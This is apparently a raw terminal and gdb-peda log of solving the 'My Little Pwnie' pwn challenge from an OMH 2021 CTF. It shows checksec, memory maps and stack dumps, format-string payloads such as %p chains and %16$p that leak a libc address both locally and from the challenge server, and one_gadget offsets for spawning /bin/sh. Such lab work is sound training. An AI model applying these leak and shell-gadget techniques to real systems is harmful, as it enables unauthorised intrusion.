mito@ubuntu:~/CTF/OMH_2021_CTF/Pwn_My_Little_Pwnie/my_little_pwnie/for_players$ checksec ./my_little_pwnie  
[*] '/home/mito/CTF/OMH_2021_CTF/Pwn_My_Little_Pwnie/my_little_pwnie/for_players/my_little_pwnie'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled


gdb-peda$ vmmap
Start              End                Perm	Name
0x0000555555554000 0x0000555555555000 r-xp	/home/mito/CTF/OMH_2021_CTF/Pwn_My_Little_Pwnie/my_little_pwnie/for_players/my_little_pwnie
0x0000555555754000 0x0000555555755000 r--p	/home/mito/CTF/OMH_2021_CTF/Pwn_My_Little_Pwnie/my_little_pwnie/for_players/my_little_pwnie
0x0000555555755000 0x0000555555777000 rw-p	[heap]
0x00007ffff79e2000 0x00007ffff7bc9000 r-xp	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7bc9000 0x00007ffff7dc9000 ---p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dc9000 0x00007ffff7dcd000 r--p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dcd000 0x00007ffff7dcf000 rw-p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dcf000 0x00007ffff7dd3000 rw-p	mapped
0x00007ffff7dd3000 0x00007ffff7dfc000 r-xp	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7fd5000 0x00007ffff7fd7000 rw-p	mapped
0x00007ffff7ff7000 0x00007ffff7ffa000 r--p	[vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp	[vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 r--p	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffe000 0x00007ffff7fff000 rw-p	mapped
0x00007ffffffde000 0x00007ffffffff000 rw-p	[stack]
0xffffffffff600000 0xffffffffff601000 r-xp	[vsyscall]


[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0xa616161 ('aaa\n')
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7fffffffdc50 ("aaaaaaa\n")
RDI: 0x7fffffffdc50 ("aaaaaaa\n")
RBP: 0x7fffffffde60 --> 0x0 
RSP: 0x7fffffffdc50 ("aaaaaaa\n")
RIP: 0x555555554539 (call   0x555555554460 <printf@plt>)
R8 : 0x555555756268 (",%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p\n")
R9 : 0x7ffff7fd64c0 (0x00007ffff7fd64c0)
R10: 0x7ffff7fd64c0 (0x00007ffff7fd64c0)
R11: 0x346 
R12: 0x5555555544a0 (and    rsp,0xfffffffffffffff0)
R13: 0x7fffffffde60 --> 0x0 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x55555555452a:	lea    rax,[rbp-0x210]
   0x555555554531:	mov    rdi,rax
   0x555555554534:	mov    eax,0x0
=> 0x555555554539:	call   0x555555554460 <printf@plt>
   0x55555555453e:	mov    edi,0x0
   0x555555554543:	call   0x555555554490 <exit@plt>
   0x555555554548:	add    DWORD PTR [rbx],ebx
   0x55555555454a:	add    edi,DWORD PTR [rbx]
Guessed arguments:
arg[0]: 0x7fffffffdc50 ("aaaaaaa\n")
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdc50 ("aaaaaaa\n")
0008| 0x7fffffffdc58 --> 0x252c70252c702500 ('')
0016| 0x7fffffffdc60 ("p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p\n")
0024| 0x7fffffffdc68 ("%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p\n")
0032| 0x7fffffffdc70 (",%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p\n")
0040| 0x7fffffffdc78 ("p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p\n")
0048| 0x7fffffffdc80 ("%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p\n")
0056| 0x7fffffffdc88 (",%p,%p,%p,%p,%p,%p,%p,%p\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000555555554539 in ?? ()
gdb-peda$ x/80gx 0x7fffffffdc00
0x7fffffffdc00:	0x00007fffffffdc50	0x0000000000000000
0x7fffffffdc10:	0x00007fffffffde60	0x0000000000000000
0x7fffffffdc20:	0x0000000000000000	0x00007ffff7a60cad
0x7fffffffdc30:	0x0000000000000000	0x00007fffffffde60
0x7fffffffdc40:	0x00005555555544a0	0x000055555555452a
0x7fffffffdc50:	0x0a61616161616161	0x252c70252c702500
0x7fffffffdc60:	0x2c70252c70252c70	0x70252c70252c7025
0x7fffffffdc70:	0x252c70252c70252c	0x2c70252c70252c70
0x7fffffffdc80:	0x70252c70252c7025	0x252c70252c70252c
0x7fffffffdc90:	0x2c70252c70252c70	0x70252c70252c7025
0x7fffffffdca0:	0x00007ffff7b9000a	0x0000000000000380
0x7fffffffdcb0:	0x00007fffffffdce0	0x00007fffffffdcf0
0x7fffffffdcc0:	0x00007ffff7ffea98	0x0000000000000000
0x7fffffffdcd0:	0x0000000000000000	0x0000000000000000
0x7fffffffdce0:	0x00000000ffffffff	0x0000000000000000
0x7fffffffdcf0:	0x00007ffff7ffa268	0x00007ffff7ffe710
0x7fffffffdd00:	0x0000000000000000	0x0000000000000000
0x7fffffffdd10:	0x0000000000000000	0x0000000000000000
0x7fffffffdd20:	0x0000000000000009	0x00007ffff7dd5660
0x7fffffffdd30:	0x00007fffffffdd98	0x0000000000f0b5ff
0x7fffffffdd40:	0x00000000000000c2	0x00007fffffffdd76
0x7fffffffdd50:	0x0000000000000001	0x00007ffff7a9dd25
0x7fffffffdd60:	0x00000000f7ffe170	0x0000000100c30000
0x7fffffffdd70:	0x0000000000000000	0x99a6a35ad3db3900
0x7fffffffdd80:	0x0000000600000000	0x0000000000000001
0x7fffffffdd90:	0x0000000000000001	0x00007ffff7ffc760
0x7fffffffdda0:	0x0000000000008000	0x0000000000000000
0x7fffffffddb0:	0x0000000000000000	0x00007ffff7a035f8
0x7fffffffddc0:	0x0000000000040000	0x0000000300000016
0x7fffffffddd0:	0x0000000000000000	0x0000000000000001
0x7fffffffdde0:	0x0000000000000001	0x00007fffffffde68
0x7fffffffddf0:	0x00007fffffffde78	0x00007ffff7dc9630
0x7fffffffde00:	0x00007ffff7ffe170	0x00007ffff7de38d3
0x7fffffffde10:	0x00007ffff7dc9638	0x000000001cd75bf0
0x7fffffffde20:	0x0000000000000000	0x0000000000000000
0x7fffffffde30:	0x0000000000000000	0x00005555555544a0
0x7fffffffde40:	0x00007fffffffde60	0x0000000000000000
0x7fffffffde50:	0x0000000000000000	0x99a6a35ad3db3900
0x7fffffffde60:	0x0000000000000000	0x00007fffffffe198
0x7fffffffde70:	0x0000000000000000	0x00007fffffffe1f4

gdb-peda$ x/80gx 0x7fffffffdc00
0x7fffffffdc00:	0x00007fffffffdc50	0x0000000000000000
0x7fffffffdc10:	0x00007fffffffde60	0x0000000000000000
0x7fffffffdc20:	0x0000000000000000	0x00007ffff7a60cad
0x7fffffffdc30:	0x0000000000000000	0x00007fffffffde60
0x7fffffffdc40:	0x00005555555544a0	0x00005555555544fb
0x7fffffffdc50:	0x0000000a31313131	0x00007ffff7ffe710
0x7fffffffdc60:	0x0000000000000000	0x00007ffff7dde39f
0x7fffffffdc70:	0x0000000000000000	0x00007fffffffddc0
0x7fffffffdc80:	0x0000000000000000	0x0000000000000000
0x7fffffffdc90:	0x0000000000000000	0x00007ffff7ffe710
0x7fffffffdca0:	0x00007ffff7b95707	0x0000000000000380
0x7fffffffdcb0:	0x00007fffffffdce0	0x00007fffffffdcf0
0x7fffffffdcc0:	0x00007ffff7ffea98	0x0000000000000000
0x7fffffffdcd0:	0x0000000000000000	0x0000000000000000
0x7fffffffdce0:	0x00000000ffffffff	0x0000000000000000
0x7fffffffdcf0:	0x00007ffff7ffa268	0x00007ffff7ffe710
0x7fffffffdd00:	0x0000000000000000	0x0000000000000000
0x7fffffffdd10:	0x0000000000000000	0x0000000000000000
0x7fffffffdd20:	0x0000000000000009	0x00007ffff7dd5660
0x7fffffffdd30:	0x00007fffffffdd98	0x0000000000f0b5ff
0x7fffffffdd40:	0x00000000000000c2	0x00007fffffffdd76
0x7fffffffdd50:	0x0000000000000001	0x00007ffff7a9dd25
0x7fffffffdd60:	0x00000000f7ffe170	0x0000000100c30000
0x7fffffffdd70:	0x0000000000000000	0x486cb8c7d4655000
0x7fffffffdd80:	0x0000000600000000	0x0000000000000001
0x7fffffffdd90:	0x0000000000000001	0x00007ffff7ffc760
0x7fffffffdda0:	0x0000000000008000	0x0000000000000000
0x7fffffffddb0:	0x0000000000000000	0x00007ffff7a035f8
0x7fffffffddc0:	0x0000000000040000	0x0000000300000016
0x7fffffffddd0:	0x0000000000000000	0x0000000000000001
0x7fffffffdde0:	0x0000000000000001	0x00007fffffffde68
0x7fffffffddf0:	0x00007fffffffde78	0x00007ffff7dc9630
0x7fffffffde00:	0x00007ffff7ffe170	0x00007ffff7de38d3
0x7fffffffde10:	0x00007ffff7dc9638	0x000000001bf1e256
0x7fffffffde20:	0x0000000000000000	0x0000000000000000
0x7fffffffde30:	0x0000000000000000	0x00005555555544a0
0x7fffffffde40:	0x00007fffffffde60	0x0000000000000000
0x7fffffffde50:	0x0000000000000000	0x486cb8c7d4655000
0x7fffffffde60:	0x0000000000000000	0x00007fffffffe198
0x7fffffffde70:	0x0000000000000000	0x00007fffffffe1f4
gdb-peda$ x/500gx 0x0000555555755000
0x555555755000 <stdout>:	0x00007ffff7dce760	0x0000000000000000
0x555555755010 <stdin>:	0x00007ffff7dcda00	0x0000000000000000
0x555555755020:	0x0000000000000000	0x0000000000000000
0x555555755030:	0x0000000000000000	0x0000000000000000


[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0xa61616161616161 ('aaaaaaa\n')
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7fffffffdc50 ("aaaaaaaaaa\n")
RDI: 0x7fffffffdc50 ("aaaaaaaaaa\n")
RBP: 0x7fffffffde60 --> 0x0 
RSP: 0x7fffffffdc48 --> 0x55555555453e (mov    edi,0x0)
RIP: 0x7ffff7a46f70 (<__printf>:	sub    rsp,0xd8)
R8 : 0x55555575626b --> 0xa3131313131 ('11111\n')
R9 : 0x7ffff7fd64c0 (0x00007ffff7fd64c0)
R10: 0x7ffff7fd64c0 (0x00007ffff7fd64c0)
R11: 0x346 
R12: 0x5555555544a0 (and    rsp,0xfffffffffffffff0)
R13: 0x7fffffffde60 --> 0x0 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff7a46f5c <__fprintf+172>:	call   0x7ffff7b16b10 <__stack_chk_fail>
   0x7ffff7a46f61:	nop    WORD PTR cs:[rax+rax*1+0x0]
   0x7ffff7a46f6b:	nop    DWORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a46f70 <__printf>:	sub    rsp,0xd8
   0x7ffff7a46f77 <__printf+7>:	test   al,al
   0x7ffff7a46f79 <__printf+9>:	mov    QWORD PTR [rsp+0x28],rsi
   0x7ffff7a46f7e <__printf+14>:	mov    QWORD PTR [rsp+0x30],rdx
   0x7ffff7a46f83 <__printf+19>:	mov    QWORD PTR [rsp+0x38],rcx
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdc48 --> 0x55555555453e (mov    edi,0x0)
0008| 0x7fffffffdc50 ("aaaaaaaaaa\n")
0016| 0x7fffffffdc58 --> 0x31313131000a6161 ('aa\n')
0024| 0x7fffffffdc60 --> 0xa ('\n')
0032| 0x7fffffffdc68 --> 0x7ffff7dde39f (<_dl_lookup_symbol_x+319>:	add    rsp,0x30)
0040| 0x7fffffffdc70 --> 0x0 
0048| 0x7fffffffdc78 --> 0x7fffffffddc0 --> 0x40000 
0056| 0x7fffffffdc80 --> 0x0 
[------------------------------------------------------------------------------]

gdb-peda$ run
Starting program: /home/mito/CTF/OMH_2021_CTF/Pwn_My_Little_Pwnie/my_little_pwnie/for_players/my_little_pwnie 
%16$p
0x7ffff7b95707



mito@ubuntu:~/CTF/OMH_2021_CTF/Pwn_My_Little_Pwnie/my_little_pwnie/for_players$ nc pwnie.zajebistyc.tf 17003
%16$p
0x7f5aeb34a707


mito@ubuntu:~/CTF/OMH_2021_CTF/Pwn_My_Little_Pwnie/my_little_pwnie/for_players$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

